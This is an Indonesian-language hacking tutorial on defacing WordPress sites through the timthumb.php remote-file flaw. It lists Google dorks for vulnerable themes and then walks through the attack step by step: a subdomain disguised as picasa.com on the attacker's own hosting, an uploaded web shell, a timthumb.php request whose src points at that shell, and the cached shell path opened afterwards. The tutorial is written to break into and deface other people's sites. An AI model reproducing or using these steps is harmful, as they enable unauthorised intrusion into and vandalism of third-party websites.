Deface Dengan timthumb Exploit Wordpress

Tim-thumb Exploit WordPress adalah teknik hacking yang dapat dilakukan dengan memanfaatkan bug pada Timthumb.php atau thumb.php.Okke Gk usah Banyak Bacod Langsung Join TKP :v

Bahan - Bahan :
  - Modem
  - PC
  - Otak
  - Subdomain picasa.com.webkamu.org

Langkah - Langkah : 

1.Meluncur Ke google Gunakan Dork Berikut

inurl:/wp-content/themes/TheStyle/
inurl:/wp-content/themes/nool/
inurl:/wp-content/themes/PersonalPress/
inurl:/wp-content/themes/SimplePress/
inurl:/wp-content/themes/DeepFocus/
inurl:/wp-content/themes/DelicateNews/
inurl:/wp-content/themes/Bold/
inurl:/wp-content/themes/eStore/
inurl:/wp-content/themes/TheProfessional/
inurl:/wp-content/themes/OnTheGo/
inurl:/wp-content/themes/AskIt/
inurl:/wp-content/themes/Nova/
inurl:/wp-content/themes/eNews/

USE YOUR BRAIN :v 

2. Setelah menemukan target coba tambahkan timthumb.php
~> http://site/wp-content/themes/eStore/timthumb.php

3.Buat Subdomain di cpanel kamu ato di hosting picasa.com.websitekamu.org disini saya tidak akan menjelaskan cara membuat subdomain pasti semua udh pada bisa :D

4.Setelah Membuat subdomain Uplod shell di subdomain tadi sehingga menjadi
~> picasa.com/websitekamu.org/namashellkamu.php

5.Setelah Selesai Semua Langsung Di eksekusi Web Tadi Dengan Cara
~> http://site/wp-content/themes/eStore/timthumb.php?src= picasa.com/websitekamu.org/shell.php 

6.Jika Keluar Seperti Gambar Ini Berarti Succes

7.Langsung Saja Buka Shellnya dgn cara
~> http://site/wp-content/themes/eStore/cache/md5_tadi.php
~> http://site/wp-content/themes/eStore/cache/b3e7dbdafde738b6e31c1d0b7fb93948.php
Thanks To :

• Panjul - T1KUS90T